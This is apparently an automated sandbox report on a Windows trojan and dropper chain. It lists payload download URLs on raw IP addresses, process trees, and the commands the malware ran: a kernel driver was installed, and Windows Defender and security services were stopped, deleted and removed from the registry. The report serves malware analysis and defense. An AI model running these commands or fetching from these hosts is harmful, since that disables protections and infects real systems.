Source: rapes.exe, 0000000B.00000002.2565136945.0000000000E5B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin1/martin.zip3F
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000EDE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/martin1/martin.zipmageres.dll
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000E50000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000B.00000002.2565136945.0000000000E99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/newdef/apple.exe
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000E50000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/newdef/apple.exeded
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000E99000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/files/newdef/apple.exeh
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe9c5e67e.
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://176.113.115.7/mine/random.exe9c5e67ee827
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/15.113.16/ferences.SourceAumidI_
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/615999F290D087244277E3
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/6165
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/B
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000002.00000002.2568047704.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php#w
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php)
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php2001
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php7w
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpOw
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpV
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.php_
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpes
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpkw
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpncoded
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpnu
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpp(
Source: axplong.exe, 00000002.00000002.2568047704.0000000000F98000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpu
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpy1mb3JtLXVybGVuY29kZWQ=wz
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/Jo89Ku7d/index.phpzRm4SJjISZA3JNjZ64n0LR=t
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/System32
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/lfons
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/onAp
Source: axplong.exe, 00000002.00000002.2568047704.0000000000FC0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.16/ta
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://crl.entrust.net/ts1ca.crl0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://ocsp.entrust.net02
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://ocsp.entrust.net03
Source: ssisd.sys.14.dr	String found in binary or memory: http://sf.symcb.com/sf.crl0a
Source: ssisd.sys.14.dr	String found in binary or memory: http://sf.symcb.com/sf.crt0
Source: ssisd.sys.14.dr	String found in binary or memory: http://sf.symcd.com0&
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: http://www.entrust.net/rpa03
Source: ssisd.sys.14.dr	String found in binary or memory: https://d.symcb.com/cps0%
Source: ssisd.sys.14.dr	String found in binary or memory: https://d.symcb.com/rpa0
Source: rapes.exe, 0000000B.00000002.2565136945.0000000000F25000.00000004.00000020.00020000.00000000.sdmp, xZRvIQ5.exe.11.dr, xZRvIQ5[1].exe.11.dr	String found in binary or memory: https://www.entrust.net/rpa0

System Summary

PE file contains section with special chars

Source: SUAosT64HD.exe	Static PE information: section name:
Source: SUAosT64HD.exe	Static PE information: section name: .idata
Source: axplong.exe.1.dr	Static PE information: section name:
Source: axplong.exe.1.dr	Static PE information: section name: .idata
Source: random[1].exe.2.dr	Static PE information: section name:
Source: random[1].exe.2.dr	Static PE information: section name: .idata
Source: random[1].exe.2.dr	Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name:
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name: .idata
Source: 3d9778a1ff.exe.2.dr	Static PE information: section name:
Source: rapes.exe.4.dr	Static PE information: section name:
Source: rapes.exe.4.dr	Static PE information: section name: .idata
Source: rapes.exe.4.dr	Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name:
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: .rsrc
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name: .idata
Source: Or1ARiR[1].exe.11.dr	Static PE information: section name:
Source: Or1ARiR.exe.11.dr	Static PE information: section name:
Source: Or1ARiR.exe.11.dr	Static PE information: section name: .rsrc
Source: Or1ARiR.exe.11.dr	Static PE information: section name: .idata
Source: Or1ARiR.exe.11.dr	Static PE information: section name:

Contains functionality to call native functions

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Code function: 2_2_0069CAC7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

2_2_0069CAC7

Creates driver files

Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe

File created: C:\Users\user\AppData\Local\Temp\ssisd.sys

Jump to behavior

Creates files inside the system directory

Source: C:\Users\user\Desktop\SUAosT64HD.exe	File created: C:\Windows\Tasks\axplong.job			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	File created: C:\Windows\Tasks\rapes.job			Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\cmd.exe

File deleted: C:\Windows\System32\Tasks\Microsoft\Windows\Windows Defender

Detected potential crypto function

Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004A5B93	1_2_004A5B93
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004A4AF0	1_2_004A4AF0
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004A4CF0	1_2_004A4CF0
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: 1_2_004E8720	1_2_004E8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_0068E440	2_2_0068E440
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006A60C2	2_2_006A60C2
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C8720	2_2_006C8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_00684AF0	2_2_00684AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C2BD0	2_2_006C2BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_00684CF0	2_2_00684CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006A0D43	2_2_006A0D43
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C6F09	2_2_006C6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C3068	2_2_006C3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006A1532	2_2_006A1532
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C765B	2_2_006C765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006C777B	2_2_006C777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006A3D21	2_2_006A3D21
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 2_2_006B7D83	2_2_006B7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C3068	3_2_006C3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_00684AF0	3_2_00684AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C2BD0	3_2_006C2BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_00684CF0	3_2_00684CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006B7D83	3_2_006B7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C765B	3_2_006C765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C777B	3_2_006C777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C8720	3_2_006C8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 3_2_006C6F09	3_2_006C6F09
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C3068	10_2_006C3068
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_00684AF0	10_2_00684AF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C2BD0	10_2_006C2BD0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_00684CF0	10_2_00684CF0
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006B7D83	10_2_006B7D83
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C765B	10_2_006C765B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C777B	10_2_006C777B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C8720	10_2_006C8720
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: 10_2_006C6F09	10_2_006C6F09

Dropped file seen in connection with other malware

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe 36AE4D38A565D2D9D1AAE3F72419FE6330FB2030017364B730393A0E4ED247D0
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\apple[1].exe 1DC8BF01C0DF1FF9C85546E5304169E7F4B79712A63FBCB13CD577808D80B3FB

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 00697F30 appears 387 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 0069D593 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 0069D872 appears 86 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 00697870 appears 42 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 0069DEB0 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 0069D57E appears 78 times
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Code function: String function: 006B8CD3 appears 47 times
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Code function: String function: 004B7F30 appears 128 times

Uses 32bit PE files

Source: SUAosT64HD.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses reg.exe to modify the Windows registry

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f

Source: SUAosT64HD.exe	Static PE information: Section: ZLIB complexity 0.9973709979564033
Source: axplong.exe.1.dr	Static PE information: Section: ZLIB complexity 0.9973709979564033
Source: random[1].exe.2.dr	Static PE information: Section: ZLIB complexity 0.9983912276170799
Source: random[1].exe.2.dr	Static PE information: Section: ldnixbmt ZLIB complexity 0.9947359228886616
Source: 3d9778a1ff.exe.2.dr	Static PE information: Section: ZLIB complexity 0.9983912276170799
Source: 3d9778a1ff.exe.2.dr	Static PE information: Section: ldnixbmt ZLIB complexity 0.9947359228886616
Source: rapes.exe.4.dr	Static PE information: Section: ZLIB complexity 0.9983912276170799
Source: rapes.exe.4.dr	Static PE information: Section: ldnixbmt ZLIB complexity 0.9947359228886616
Source: Or1ARiR[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9980737036401099
Source: Or1ARiR[1].exe.11.dr	Static PE information: Section: iphnbyse ZLIB complexity 0.9946029135338346
Source: Or1ARiR.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9980737036401099
Source: Or1ARiR.exe.11.dr	Static PE information: Section: iphnbyse ZLIB complexity 0.9946029135338346
Source: xZRvIQ5[1].exe.11.dr	Static PE information: Section: .cSs ZLIB complexity 1.0003236607142858
Source: xZRvIQ5.exe.11.dr	Static PE information: Section: .cSs ZLIB complexity 1.0003236607142858

Source: axplong.exe.1.dr	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: SUAosT64HD.exe	Static PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@118/47@0/3

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4860:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \BaseNamedObjects\Local\SM0:3328:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3940:120:WilError_03

Source: C:\Users\user\Desktop\SUAosT64HD.exe

File created: C:\Users\user\AppData\Local\Temp\44111dbc49

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\22.exe

Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"

Source: C:\Users\user\Desktop\SUAosT64HD.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\SUAosT64HD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SUAosT64HD.exe	ReversingLabs: Detection: 73%
Source: SUAosT64HD.exe	Virustotal: Detection: 77%

Source: 3d9778a1ff.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: 3d9778a1ff.exe	String found in binary or memory: " /add
Source: 3d9778a1ff.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y
Source: rapes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: rapes.exe	String found in binary or memory: " /add
Source: rapes.exe	String found in binary or memory: " /add /y

Source: C:\Users\user\Desktop\SUAosT64HD.exe

File read: C:\Users\user\Desktop\SUAosT64HD.exe

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
Source: unknown	Process created: C:\Users\user\Desktop\SUAosT64HD.exe "C:\Users\user\Desktop\SUAosT64HD.exe"
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe "C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe"
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
Source: C:\Program Files\Windows Defender\MpCmdRun.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe "C:\Users\user\AppData\Local\Temp\10357800101\apple.exe"
Source: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5B75.tmp\5B86.tmp\5B87.bat C:\Users\user\AppData\Local\Temp\22.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\22.exe "C:\Users\user\AppData\Local\Temp\22.exe" go
Source: C:\Users\user\AppData\Local\Temp\22.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\5CCD.tmp\5CCE.tmp\5CCF.bat C:\Users\user\AppData\Local\Temp\22.exe go"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc create ddrver type= kernel binPath= "C:\Users\user\AppData\Local\Temp\ssisd.sys"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\timeout.exe timeout /t 1
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc start ddrver
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\takeown.exe takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\icacls.exe icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe "C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WinDefend"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "MDCoreSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "WdNisSvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "Sense"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc stop "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\sc.exe sc delete "wscsvc"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
Source: C:\Windows\System32\sc.exe	Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\svchost.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable	Jump to behavior
Source: C:\Users\user\Desktop\SUAosT64HD.exe	Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Process created: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe "C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1021872001\3d9778a1ff.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10357800101\apple.exe "C:\Users\user\AppData\Local\Temp\10357800101\apple.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe "C:\Users\user\AppData\Local\Temp\10358260101\Rm3cVPI.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: unknown unknown	Jump to behavior
